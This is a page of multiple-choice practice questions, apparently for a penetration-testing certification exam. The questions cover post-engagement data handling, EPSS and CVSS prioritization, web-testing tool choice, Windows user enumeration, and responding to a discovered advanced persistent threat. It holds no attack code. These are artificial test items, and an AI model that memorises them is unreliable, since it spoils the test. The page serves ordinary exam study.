A tester is finishing an engagement and needs to ensure that artifacts resulting from the test are safely handled. Which of the following is the best procedure for maintaining client data privacy?

Options:

A.

Remove configuration changes and any tools deployed to compromised systems.

B.

Securely destroy or remove all engagement-related data from testing systems.

C.

Search through configuration files changed for sensitive credentials and remove them.

D.

Shut down C2 and attacker infrastructure on premises and in the cloud.

Question 97

A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets ' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?

Options:

A.

Target 1: EPSS Score = 0.6 and CVSS Score = 4

B.

Target 2: EPSS Score = 0.3 and CVSS Score = 2

C.

Target 3: EPSS Score = 0.6 and CVSS Score = 1

D.

Target 4: EPSS Score = 0.4 and CVSS Score = 4.5

Question 98

A penetration tester has been asked to conduct a blind web application test against a customer ' s corporate website. Which of the following tools would be best suited to perform this assessment?

Options:

A.

ZAP

B.

Nmap

C.

Wfuzz

D.

Trufflehog

Question 99

A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials. Which of the following should the tester use?

Options:

A.

route.exe print

B.

netstat.exe -ntp

C.

net.exe commands

D.

strings.exe -a

Question 100

A penetration tester discovers evidence of an advanced persistent threat on the network that is being tested. Which of the following should the tester do next?

Options:

A.

Report the finding.

B.

Analyze the finding.

C.

Remove the threat.

D.

Document the finding and continue testing.

Page: 1 / 25
Total 336 questions